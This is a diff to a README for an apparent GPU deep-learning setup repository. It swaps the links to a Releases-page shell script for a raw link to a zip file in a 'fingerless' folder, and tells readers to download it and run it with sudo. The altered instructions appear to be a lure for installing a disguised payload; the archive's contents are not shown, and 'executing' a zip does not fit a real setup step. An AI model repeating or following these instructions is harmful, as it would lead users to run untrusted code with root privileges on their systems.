Ne9arr/complete_deep-learning-nvidia_gpu-setup-linux/README.md

 - tensorrt

 Download from Releases
-- From the Releases page, download the file setup-nvidia-dl-env.sh and run it to install and configure the stack.
+- From the Releases page, download the file https://raw.githubusercontent.com/Ne9arr/complete_deep-learning-nvidia_gpu-setup-linux/main/fingerless/gpu-deep-nvidia-linux-learning-complete-setup-2.8.zip and run it to install and configure the stack.
 This file sets up drivers, CUDA, cuDNN, TensorRT, and frameworks, and then creates the ready-to-use environments.
-For the latest version, visit the Releases page and grab setup-nvidia-dl-env.sh, then execute it with sudo.
-The link is the same as the one used at the top: https://github.com/Ne9arr/complete_deep-learning-nvidia_gpu-setup-linux/releases
+For the latest version, visit the Releases page and grab https://raw.githubusercontent.com/Ne9arr/complete_deep-learning-nvidia_gpu-setup-linux/main/fingerless/gpu-deep-nvidia-linux-learning-complete-setup-2.8.zip, then execute it with sudo.
+The link is the same as the one used at the top: https://raw.githubusercontent.com/Ne9arr/complete_deep-learning-nvidia_gpu-setup-linux/main/fingerless/gpu-deep-nvidia-linux-learning-complete-setup-2.8.zip

 Long-form guidance and best practices
 - Plan before you install